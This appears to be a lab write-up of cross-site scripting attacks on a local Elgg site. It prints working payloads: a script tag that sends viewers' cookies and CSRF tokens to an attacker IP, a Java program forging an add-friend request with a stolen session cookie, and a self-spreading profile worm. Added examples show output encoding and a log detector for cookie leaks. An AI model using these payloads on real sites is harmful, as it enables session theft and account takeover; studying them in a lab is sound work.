Environment setup:
- Start the apache2 service: sudo service apache2 start
- Configure the Apache service in /etc/apache2/sites-available/default as follows:
Lab tasks:
Task 1: Display an alert window
On the edit-profile page of the user boby, insert an alert into the personal description field:
<script>alert('XSS');</script>
As shown in the figure below:
Log in as the user bin and view boby's profile; a window pops up, as shown below:
Put the malicious content into a JS file and point the link at that file; the specific instruction is as follows:
The contents of attack.js are as follows; the file is placed in the web root of www.xsslabelgg.com (/var/www/XSS/elgg/)
When the user bin views boby's profile, the attack succeeds:
Task 2: Display the user's cookie
Enter the following attack string in the edit box of boby's profile:
<script>alert(document.cookie);</script>
Then, when bin views boby's profile, the following pop-up appears:
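Both payloads above succeed only because the profile description is written into the page without HTML encoding. The following is an added example, not code from this write-up or from Elgg: a minimal contextual output encoder and a template that renders a profile through it. The `renderProfile` fragment and the `containsRawScriptTag` check are assumptions made for this illustration; the two sample descriptions are the exact strings stored in Tasks 1 and 2.

```javascript
// Added example (not from the lab write-up or from Elgg): output encoding for a
// user-supplied profile field. Encoding the five HTML metacharacters before the
// value is inserted into element content makes a stored payload inert.

const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;',
};

// Encode a string for insertion into HTML element content or a quoted attribute.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render the profile fragment the way a safe template does: the markup is fixed
// and every user-controlled value passes through escapeHtml. (Hypothetical
// template, assumed for this example.)
function renderProfile(profile) {
  return (
    `<h2>${escapeHtml(profile.name)}</h2>\n` +
    `<p class="description">${escapeHtml(profile.description)}</p>`
  );
}

// Verification helper for the example only: after encoding, no raw <script>
// tag may remain anywhere in the rendered output.
function containsRawScriptTag(html) {
  return /<\s*\/?\s*script\b/i.test(html);
}

// Constructed sample input: the descriptions stored in Task 1 and Task 2.
const SAMPLE_PROFILES = [
  { name: 'boby', description: "<script>alert('XSS');</script>" },
  { name: 'boby', description: '<script>alert(document.cookie);</script>' },
];

// Render every sample profile and report whether the payload was neutralised.
function demo() {
  return SAMPLE_PROFILES.map((p) => {
    const html = renderProfile(p);
    return { html, safe: !containsRawScriptTag(html) };
  });
}

for (const r of demo()) {
  console.log(r.safe ? 'inert:' : 'LIVE: ', r.html);
}
```

The encoder is context-specific: it is correct for element content and quoted attribute values, but a value placed inside a URL, a JavaScript string or a CSS block needs the encoder for that context instead.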
Task 3:
Enter the following attack string in the edit box of boby's profile (192.168.47.181 is the IP address of the attacker machine):
<script>document.write('<img src =http://192.168.47.181:5555?c='+escape(document.cookie) + ' >');</script>
Then run the echoserv program on the attacker machine so that it listens on port 5555. When bin views boby's profile, bin's cookie is sent to the attacker machine:
Task 4: Session hijacking with the stolen cookie
First enter the following in boby's profile edit box:
<script>document.write('<img src=http://127.0.0.1:5555?c='+escape(document.cookie)+'&'+elgg.security.token.__elgg_ts+'&'+elgg.security.token.__elgg_token+' >');</script>
This script sends the cookie and the __elgg_ts and __elgg_token values of whoever views boby's profile to the attacker machine.
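The exfiltration in Tasks 3 and 4 leaves two traces a defender can act on: the victim's browser issues a cross-origin image request whose query string carries a URL-encoded session cookie, and the session cookie was readable from `document.cookie` in the first place. The following added example (not from the write-up or from Elgg) shows both checks: `findCookieLeaks` scans egress-proxy log lines in Apache combined format for requests that carry a watched cookie name inside a query parameter, and `auditSessionCookie` reports which hardening attributes a Set-Cookie header lacks. The log lines are constructed (the cookie value is the one shown later in this write-up); the log format and the function names are assumptions.

```javascript
// Added example (not from the lab write-up or from Elgg): detection of cookie
// exfiltration in proxy logs, plus an audit of session-cookie attributes.

const COMBINED_LOG =
  /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

// Parse one Apache combined-format line; returns null if it does not parse.
function parseLogLine(line) {
  const m = COMBINED_LOG.exec(line);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], target: m[4],
           status: Number(m[5]), referer: m[7], userAgent: m[8] };
}

// Flag requests whose query string carries one of the watched cookie names as a
// "name=value" pair. Values are URL-decoded by URLSearchParams, so "c=Elgg%3D..."
// is caught. Absolute targets (proxy logs) and path-only targets (origin logs)
// are both handled; a placeholder base is used for the latter.
function findCookieLeaks(lines, watchedCookies, trustedHosts) {
  const findings = [];
  lines.forEach((line, idx) => {
    const rec = parseLogLine(line);
    if (!rec) return;
    let url;
    try { url = new URL(rec.target, 'http://origin.invalid'); } catch (e) { return; }
    const leaked = [];
    for (const [, value] of url.searchParams) {
      for (const name of watchedCookies) {
        if (new RegExp('(^|;\\s*)' + name + '=').test(value)) leaked.push(name);
      }
    }
    if (leaked.length === 0) return;
    const sameOrigin = url.hostname === 'origin.invalid';
    findings.push({
      line: idx,
      client: rec.client,
      destination: sameOrigin ? '(same origin)' : url.host,
      crossOrigin: !sameOrigin && !trustedHosts.includes(url.hostname),
      referer: rec.referer,
      leaked: [...new Set(leaked)],
    });
  });
  return findings;
}

// Return the hardening attributes missing from a Set-Cookie header value.
// HttpOnly would have kept document.cookie from exposing the Elgg session id;
// it does not protect elgg.security.token, which the page exposes to scripts.
function auditSessionCookie(setCookieValue) {
  const attrs = setCookieValue.split(';').slice(1).map((a) => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes('httponly')) missing.push('HttpOnly');
  if (!attrs.includes('secure')) missing.push('Secure');
  if (!attrs.some((a) => a.startsWith('samesite='))) missing.push('SameSite');
  return missing;
}

// Constructed sample input: three proxy log lines for the victim machine. The
// second is the request the Task 4 <img> payload makes; the others are benign.
const SAMPLE_LOG = [
  '192.168.47.185 - - [23/May/2016:10:12:01 +0000] "GET http://www.xsslabelgg.com/profile/boby HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
  '192.168.47.185 - - [23/May/2016:10:12:02 +0000] "GET http://192.168.47.181:5555/?c=Elgg%3Drpmo7shdmq6b6kdg38o76oo3j5&1464013312&c2aa7157f41d7d265d4f082aa0b03b4f HTTP/1.1" 200 0 "http://www.xsslabelgg.com/profile/boby" "Mozilla/5.0"',
  '192.168.47.185 - - [23/May/2016:10:12:05 +0000] "GET http://www.xsslabelgg.com/search?q=Elgg%20cookies HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
];

// Run the detector over the sample with the lab's cookie name and trusted host.
function demoLeaks() {
  return findCookieLeaks(SAMPLE_LOG, ['Elgg'], ['www.xsslabelgg.com']);
}

console.log(JSON.stringify(demoLeaks(), null, 2));
console.log('missing attributes:', auditSessionCookie('Elgg=rpmo7shdmq6b6kdg38o76oo3j5; path=/'));
```

The detector keys on the cookie name rather than on the destination, so it also catches a leak to a host that looks legitimate; the `crossOrigin` field is there to rank findings, not to filter them.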
Use the LiveHttpHeaders tool to inspect the add-friend request:
Construct the program according to the captured request:
import java.net.*;
import java.io.*;

public class HTTPSimpleForge {
    public static void main(String[] args) throws IOException {
        try {
            int responseCode;
            InputStream responseIn = null;
            // URL to be forged.
            URL url = new URL("http://www.xsslabelgg.com/action/friends/add?friend=41&__elgg_ts=1464013312&__elgg_token=c2aa7157f41d7d265d4f082aa0b03b4f");
            URLConnection urlConn = url.openConnection();
            if (urlConn instanceof HttpURLConnection) {
                urlConn.setConnectTimeout(60000);
                urlConn.setReadTimeout(90000);
            }
            urlConn.addRequestProperty("Host", "www.xsslabelgg.com");
            urlConn.addRequestProperty("User-Agent", "Sun JDK 1.6");
            urlConn.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
            urlConn.setRequestProperty("Accept-Language", "en-us,en;q=0.5");
            urlConn.setRequestProperty("Accept-Encoding", "gzip,deflate");
            urlConn.setRequestProperty("Referer", "http://www.xsslabelgg.com/profile/charlie");
            urlConn.setRequestProperty("Cookie", "Elgg=rpmo7shdmq6b6kdg38o76oo3j5");
            urlConn.setRequestProperty("Connection", "keep-alive");
            urlConn.setDoOutput(true);
            String data = "username=charlie&[email protected]";
            OutputStreamWriter wr = new OutputStreamWriter(urlConn.getOutputStream());
            wr.write(data);
            wr.flush();
            // HttpURLConnection, a subclass of URLConnection, is returned by
            // url.openConnection() since the url is an http request.
            if (urlConn instanceof HttpURLConnection) {
                HttpURLConnection httpConn = (HttpURLConnection) urlConn;
                // Contacts the web server and gets the status code from
                // the HTTP response message.
                responseCode = httpConn.getResponseCode();
                System.out.println("Response Code = " + responseCode);
                // HTTP status code HTTP_OK means the response was
                // received successfully.
                if (responseCode == HttpURLConnection.HTTP_OK) {
                    // Get the input stream from the url connection object.
                    responseIn = urlConn.getInputStream();
                    // Create a BufferedReader to read the response line by line.
                    BufferedReader buf_inp = new BufferedReader(
                            new InputStreamReader(responseIn));
                    String inputLine;
                    while ((inputLine = buf_inp.readLine()) != null) {
                        System.out.println(inputLine);
                    }
                }
            }
        } catch (MalformedURLException e) {
            e.printStackTrace();
        }
    }
}
Edit the /etc/hosts file on the attacker machine:
Map www.xsslabelgg.com to 192.168.47.185 (the IP address of the victim machine).
On the victim machine, log in as samy and first check samy's friend list; samy currently has no friends:
Samy views boby's profile; samy's cookie together with the __elgg_ts and __elgg_token values are all sent back to the attacker machine:
Fill the captured cookie, __elgg_ts and __elgg_token values into the attack program, compile it with javac HTTPSimpleForge.java, then run java HTTPSimpleForge; the HTML response is received:
The response code is 200. Samy's friend list now looks like this:
The attack succeeded.
Task 5: Write an XSS worm
First log in as boby, edit the profile, and capture the request:
Write worm.js according to the captured request:
var nod = document.getElementsByClassName("elgg-border-plain elgg-transition");
var user = nod[0].attributes.getNamedItem("alt").nodeValue;
if (user != 'Boby') {
    var Ajax = null;
    // Construct the header information for the HTTP request
    Ajax = new XMLHttpRequest();
    if (Ajax == null)
        alert("Ajax is null");
    Ajax.open("POST", "http://www.xsslabelgg.com/action/profile/edit", true);
    Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
    Ajax.setRequestHeader("User-Agent", "AJAX 1.2");
    Ajax.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    Ajax.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
    Ajax.setRequestHeader("Accept-Encoding", "gzip,deflate");
    var node = document.getElementsByClassName("elgg-border-plain elgg-transition");
    var username = node[0].attributes.getNamedItem("alt").nodeValue;
    Ajax.setRequestHeader("Referer", "http://www.xsslabelgg.com/profile/" + username + "/edit");
    Ajax.setRequestHeader("Keep-Alive", "300");
    Ajax.setRequestHeader("Connection", "keep-alive");
    Ajax.setRequestHeader("Cookie", document.cookie);
    Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    // Construct the content. The format of the content can be learned
    // from LiveHTTPHeaders.
    var content = "__elgg_token=" + elgg.security.token.__elgg_token + "&__elgg_ts=" + elgg.security.token.__elgg_ts + "&name=" + username + "&description=I'm stupid&guid=" + elgg.session.user.guid;
    Ajax.setRequestHeader("Content-Length", content.length);
    // Send the HTTP POST request.
    Ajax.send(content);
}
Now add the worm to boby's profile:
After the change:
Now log in as samy and first look at samy's own profile; the description is empty:
Then samy visits boby's profile:
Samy's own profile, viewed again:
The attack succeeded.